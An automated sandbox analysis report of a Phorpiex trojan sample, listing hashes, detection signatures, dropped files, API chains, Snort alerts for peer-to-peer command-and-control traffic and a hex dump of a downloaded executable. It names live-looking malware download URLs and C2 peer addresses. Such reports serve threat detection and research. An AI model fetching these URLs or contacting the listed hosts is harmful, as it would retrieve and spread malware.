Windows Analysis Report
957C4XK6Lt.exe

Overview

General Information

Sample name: 957C4XK6Lt.exe
renamed because original name is a hash value
Original sample name: f33c75710d0e0463a2528e619c2ee382.exe
Analysis ID: 1430850
MD5: f33c75710d0e0463a2528e619c2ee382
SHA1: 4d2dd071fe274e6a8696448c21eeeecc0cf07e6d
SHA256: ec7dd08d03d5d4142c82fc04cea7e948d05641b0a3008a0d8a00b0421b5b04f9
Tags: 32exetrojan
Infos:

Detection

Phorpiex
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Phorpiex
Changes security center settings (notifications, updates, antivirus, firewall)
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to check if Internet connection is working
Contains functionality to detect sleep reduction / modifications
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Abnormal high CPU Usage
Connects to several IPs in different countries
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://twizt.net/pei Avira URL Cloud: Label: malware
Source: http://twizt.net/new Avira URL Cloud: Label: malware
Source: http://185.215.113.66/1D Avira URL Cloud: Label: malware
Source: http://185.215.113.66/383( Avira URL Cloud: Label: malware
Source: http://185.215.113.66/http://91.202.233.141/http://193.233.132.177/123456%s%s%s:Zone.Identifier%user Avira URL Cloud: Label: malware
Source: http://twizt.net/peinstall.php5%z Avira URL Cloud: Label: malware
Source: http://twizt.net/newtpp.z% Avira URL Cloud: Label: malware
Source: http://185.215.113.66/ Avira URL Cloud: Label: malware
Source: http://twizt.net/peinstall.phpb Avira URL Cloud: Label: malware
Source: http://twizt.net/peinstall.phpshqos.dll.muiS9 Avira URL Cloud: Label: malware
Source: http://twizt.net/newtpp.exeP0S Avira URL Cloud: Label: malware
Source: http://185.215.113.66/1~ Avira URL Cloud: Label: malware
Source: http://twizt.net/peinstall.phpm% Avira URL Cloud: Label: malware
Source: http://185.215.113.66/5 Avira URL Cloud: Label: malware
Source: http://185.215.113.66/4 Avira URL Cloud: Label: malware
Source: http://185.215.113.66/3 Avira URL Cloud: Label: malware
Source: http://185.215.113.66/2 Avira URL Cloud: Label: malware
Source: http://185.215.113.66/6 Avira URL Cloud: Label: malware
Source: http://185.215.113.66/1 Avira URL Cloud: Label: malware
Source: http://twizt.net/peinstall.php%temp%%s Avira URL Cloud: Label: malware
Source: http://twizt.net/newtpp.exeP0 Avira URL Cloud: Label: malware
Source: http://twizt.net/peinstall.phpystem32 Avira URL Cloud: Label: malware
Source: http://twizt.net/= Avira URL Cloud: Label: malware
Source: http://twizt.net/newtpp.exe Avira URL Cloud: Label: malware
Source: http://twizt.net/peinstall.php Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\sysvratrel.exe Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\AppData\Local\Temp\1682018248.exe Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\sysvratrel.exe Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe Avira: detection malicious, Label: HEUR/AGEN.1315882
Multi AV Scanner detection for domain / URL
Source: twizt.net Virustotal: Detection: 21% Perma Link
Source: http://91.202.233.141/ Virustotal: Detection: 8% Perma Link
Source: http://twizt.net/pei Virustotal: Detection: 14% Perma Link
Source: http://twizt.net/new Virustotal: Detection: 14% Perma Link
Source: http://185.215.113.66/1D Virustotal: Detection: 17% Perma Link
Source: http://91.202.233.141/5 Virustotal: Detection: 5% Perma Link
Source: http://91.202.233.141/6 Virustotal: Detection: 5% Perma Link
Source: http://185.215.113.66/http://91.202.233.141/http://193.233.132.177/123456%s%s%s:Zone.Identifier%user Virustotal: Detection: 16% Perma Link
Source: http://91.202.233.141/4 Virustotal: Detection: 5% Perma Link
Source: http://twizt.net/peinstall.phpb Virustotal: Detection: 14% Perma Link
Source: http://185.215.113.66/1~ Virustotal: Detection: 15% Perma Link
Source: http://185.215.113.66/ Virustotal: Detection: 17% Perma Link
Source: http://185.215.113.66/5 Virustotal: Detection: 18% Perma Link
Source: http://185.215.113.66/4 Virustotal: Detection: 18% Perma Link
Source: http://193.233.132.177/ Virustotal: Detection: 7% Perma Link
Source: http://185.215.113.66/3 Virustotal: Detection: 18% Perma Link
Source: http://185.215.113.66/2 Virustotal: Detection: 18% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\135143440.exe ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\1682018248.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\sysvratrel.exe ReversingLabs: Detection: 64%
Source: C:\Windows\sysvratrel.exe ReversingLabs: Detection: 64%
Multi AV Scanner detection for submitted file
Source: 957C4XK6Lt.exe ReversingLabs: Detection: 68%
Source: 957C4XK6Lt.exe Virustotal: Detection: 55% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Joe Sandbox ML: detected
Source: C:\Users\user\sysvratrel.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1682018248.exe Joe Sandbox ML: detected
Source: C:\Users\user\sysvratrel.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 957C4XK6Lt.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_0040C0C0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 3_2_0040C0C0
Source: C:\Users\user\sysvratrel.exe Code function: 5_2_0040C0C0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 5_2_0040C0C0
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_0040C0C0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 8_2_0040C0C0

Phishing
barindex
Yara detected Phorpiex
Source: Yara match File source: 5.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.1682018248.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.1682018248.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.135143440.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.135143440.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 135143440.exe PID: 6684, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sysvratrel.exe PID: 5676, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 1682018248.exe PID: 6528, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sysvratrel.exe PID: 2012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sysvratrel.exe PID: 6196, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\sysvratrel.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\sysvratrel.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1682018248.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\135143440.exe, type: DROPPED
Uses 32bit PE files
Source: 957C4XK6Lt.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\957C4XK6Lt.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll Jump to behavior
Source: 957C4XK6Lt.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose, 3_2_00406650
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW, 3_2_00406510
Source: C:\Users\user\sysvratrel.exe Code function: 5_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose, 5_2_00406650
Source: C:\Users\user\sysvratrel.exe Code function: 5_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW, 5_2_00406510
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose, 8_2_00406650
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW, 8_2_00406510

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2856563 ETPRO TROJAN Phorpiex Domain in DNS Lookup 192.168.2.6:59936 -> 1.1.1.1:53
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 120.237.99.181:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 85.113.19.18:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 5.200.152.6:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 82.114.186.50:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 95.71.69.217:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 36.20.68.95:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 2.180.157.70:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 186.94.185.219:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 197.148.34.173:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 5.200.190.214:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 39.53.75.107:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 89.218.235.182:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 95.58.18.206:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 31.186.54.5:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 217.20.222.188:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 91.234.219.185:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 41.102.227.47:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 134.35.74.170:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 2.185.146.181:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 82.194.11.2:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 37.20.161.137:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 151.233.73.168:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 89.219.115.32:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 128.65.176.18:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 212.112.112.84:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 92.47.124.54:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 181.114.188.143:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 89.236.226.70:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 46.35.86.48:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 2.190.224.61:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 92.46.174.254:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 31.186.49.163:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 5.251.56.144:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 134.35.173.140:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 5.233.222.244:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 134.35.81.188:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 2.191.221.216:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 189.158.148.85:40500
Source: Traffic Snort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 134.35.163.241:40500
Contains functionality to check if Internet connection is working
Source: C:\Users\user\AppData\Local\Temp\135143440.exe Code function: 3_2_0040ACC0 htons,socket,connect,getsockname, www.update.microsoft.com 3_2_0040ACC0
Source: C:\Users\user\sysvratrel.exe Code function: 5_2_0040ACC0 htons,socket,connect,getsockname, www.update.microsoft.com 5_2_0040ACC0
Source: C:\Users\user\sysvratrel.exe Code function: 8_2_0040ACC0 htons,socket,connect,getsockname, www.update.microsoft.com 8_2_0040ACC0
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 20
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49716 -> 134.35.81.188:40500
Source: global traffic TCP traffic: 192.168.2.6:49724 -> 109.72.204.86:40500
Source: global traffic TCP traffic: 192.168.2.6:49732 -> 213.230.90.222:40500
Source: global traffic TCP traffic: 192.168.2.6:49739 -> 5.232.84.160:40500
Source: global traffic TCP traffic: 192.168.2.6:49747 -> 195.181.62.5:40500
Source: global traffic TCP traffic: 192.168.2.6:49755 -> 189.190.10.16:40500
Source: global traffic TCP traffic: 192.168.2.6:49761 -> 94.141.69.176:40500
Source: global traffic TCP traffic: 192.168.2.6:49763 -> 156.212.34.122:40500
Source: global traffic TCP traffic: 192.168.2.6:49770 -> 84.53.244.106:40500
Source: global traffic TCP traffic: 192.168.2.6:49774 -> 195.158.15.3:40500
Source: global traffic TCP traffic: 192.168.2.6:49778 -> 109.122.77.179:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 120.237.99.181:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 85.113.19.18:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 5.200.152.6:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 82.114.186.50:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 95.71.69.217:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 95.107.12.43:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 36.20.68.95:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 2.180.157.70:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 186.94.185.219:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 197.148.34.173:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 5.200.190.214:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 5.63.93.62:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 39.53.75.107:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 89.218.235.182:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 95.58.18.206:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 31.186.54.5:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 217.20.222.188:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 134.35.185.171:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 91.234.219.185:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 41.102.227.47:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 134.35.74.170:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 2.185.146.181:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 82.194.11.2:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 95.156.103.50:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 37.20.161.137:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 151.233.73.168:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 89.219.115.32:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 128.65.176.18:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 212.112.112.84:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 185.177.0.227:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 92.47.124.54:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 181.114.188.143:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 89.236.226.70:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 46.35.86.48:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 2.190.224.61:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 105.109.202.176:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 92.46.174.254:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 31.186.49.163:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 5.251.56.144:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 134.35.173.140:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 5.233.222.244:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 151.233.21.215:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 2.191.221.216:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 189.158.148.85:40500
Source: global traffic UDP traffic: 192.168.2.6:59141 -> 134.35.163.241:40500
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:06:57 GMTContent-Type: application/octet-streamContent-Length: 86016Last-Modified: Tue, 23 Apr 2024 21:19:33 GMTConnection: keep-aliveETag: "662825e5-15000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d ab 71 6a 29 ca 1f 39 29 ca 1f 39 29 ca 1f 39 20 b2 95 39 2e ca 1f 39 51 b8 1e 38 2b ca 1f 39 ea c5 42 39 2b ca 1f 39 ea c5 40 39 28 ca 1f 39 ea c5 10 39 2b ca 1f 39 0e 0c 72 39 2d ca 1f 39 29 ca 1e 39 e9 ca 1f 39 0e 0c 64 39 3c ca 1f 39 20 b2 9c 39 2d ca 1f 39 20 b2 9b 39 35 ca 1f 39 20 b2 8e 39 28 ca 1f 39 52 69 63 68 29 ca 1f 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cf 25 28 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e6 00 00 00 78 00 00 00 00 00 00 d0 74 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 01 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 27 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a e5 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 37 00 00 00 00 01 00 00 38 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 3f 00 00 00 40 01 00 00 2e 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TPSUZ-ASUZ TPSUZ-ASUZ
Source: Joe Sandbox View ASN Name: PTC-YEMENNETYE PTC-YEMENNETYE
Uses a known web browser user agent for HTTP communication
